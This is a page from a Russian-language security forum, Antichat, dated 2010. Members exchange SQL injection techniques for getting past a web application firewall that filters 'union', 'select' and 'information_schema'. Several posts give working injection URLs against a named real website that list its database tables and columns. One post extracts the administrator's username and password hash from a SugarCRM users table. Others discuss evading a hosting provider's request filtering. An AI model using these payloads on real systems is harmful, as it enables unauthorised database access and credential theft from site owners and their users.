HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1536 из 2438 « Первая < 5361036143614861526 1532 1533 1534 1535 1536 1537 1538 1539 1540 1546158616362036 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15351  
Старый 15.10.2010, 09:49
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от nullik  
nullik said:
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.
Может быть ты имел ввиду

Код HTML:
HTML:
union+(select+1,2,table_name,4,5+from+(information_schema.tables))
Пробуй так:

Код:
Code:
from+information_schema.`tables`
Код:
Code:
from+/*!information_schema.tables*/
И с чего ты взял, что там фильтруется именно union select information_schema.tables, а не например union select from?

Вот варианты на случай, если фильтруется union select from /showpost.php?p=2289579&postcount=14623, ну и если фильтруется и то и другое.
 
Ответить с цитированием

  #15352  
Старый 15.10.2010, 09:59
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Ну и from+information_schema./*!tables*/

Да и вообще, не факт что там именно на .tables реагирует.

Поэтому или ссылку кидай или потестируй на каком этапе отрубает.
 
Ответить с цитированием

  #15353  
Старый 15.10.2010, 12:04
Алкорайдер
Новичок
Регистрация: 03.06.2009
Сообщений: 10
Провел на форуме:
178004

Репутация: 0
По умолчанию
буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы

буду использовать гугл прежде чем задавать вопросы
 
Ответить с цитированием

  #15354  
Старый 15.10.2010, 15:39
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию
Цитата:
Сообщение от nullik  
nullik said:
Стоит какой-то ваф с фильтрами на union,select и слово information_schema. Union и select обошел скобочками, а вот инф_схема никак не могу, выбрасывает на forbidden и всё тут. /**/ не помогает.
union(SELECT+1,table_name,3,4,5)from(iNformation_s chema.tabl%00es) Вот так не работает.
union(SELECT+1,version(),3,4,5) так работает.
Посоветуйте что-либо плиз.
Спасибо.
На локальной серваке следующие запросы вызывали ошибку:

(SELECT+1,table_name,3,4,5)from(iNformation_schema .tabl%00es)

(SELECT+1,table_name,3,4,5)from(iNformation_schema .tables)

а вот запрос

(SELECT+1,table_name,3,4,5 from iNformation_schema.tables)

прошел.

Кстати не понял почему такой запрос тоже вызвал ошибку

(SELECT+1,table_name,3,4,5+from iNformation_schema.tables)
 
Ответить с цитированием

  #15355  
Старый 15.10.2010, 16:21
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию
Redwood, мне нужно слить определенные таблицы (например users)
 
Ответить с цитированием

  #15356  
Старый 15.10.2010, 23:26
grably
Новичок
Регистрация: 06.07.2009
Сообщений: 18
Провел на форуме:
54785

Репутация: 0
По умолчанию
Приветсвую господа!

Столкнулся с такой траблой, прочитал все таблицы:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28table_name %29,5,6,7,8,9+from+information_schema.tables+where +table_schema=database%28%29+--+

затем прочитал колонки:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_nam e%29,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273+--+

но вывести данные которые нужно не могу, выводит лишь первую колонку:

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,id_user,5,6,7,8,9+from+us ers+--+

а вывести user_name,user_hash не получается никак, я так понимаю это фильтруется, пробовал юзать CHAR, HEX, не пашет ((

Посоветуйте, пожалуйста!

П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?
 
Ответить с цитированием

  #15357  
Старый 15.10.2010, 23:55
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
таблиц users несколько, в той базе с которой ты работаешь в этой таблице нет колонок user_name.

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28column_nam e%29,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273%20and%20table_schema=0x 70726f70726f6a5f70726f70726f6a6563746f72+--+

user_name

http://www.pro-projector.ru/news_N.php?id_page=13-999.9+union+select+1,2,3,group_concat%28user_name% 29,5,6,7,8,9+from+proproj_sugarcrm.users+--+
 
Ответить с цитированием

  #15358  
Старый 16.10.2010, 00:05
KREGI
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759

Репутация: -9
По умолчанию
Логин админа

http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_name,5,6,7,8,9%20from%20proproj_suga rcrm.users

Хеш пароля админа

http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20 %201,2,3,user_hash,5,6,7,8,9%20from%20proproj_suga rcrm.users

p.s. отображаются в теге title
 
Ответить с цитированием

  #15359  
Старый 16.10.2010, 00:11
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию
Цитата:
Сообщение от grably  
grably said:
П.С. Друзья а как вы боретесь с хостингом SWEB.RU который мешает проверять сайты на прочность ?
Сам не сталкивался, а каким образом это проявляется?
 
Ответить с цитированием

  #15360  
Старый 16.10.2010, 00:18
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от mr.celt  
mr.celt said:
Сам не сталкивался, а каким образом это проявляется?
Фаервол стоит, который проверяет запросы на наличие запрещенных слов (from, information_schema и еще каких-то) и редиректит на служебную страницу с сообщением, что запрос отвергнут
 
Ответить с цитированием
Ответ
Страница 1536 из 2438 « Первая < 5361036143614861526 1532 1533 1534 1535 1536 1537 1538 1539 1540 1546158616362036 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ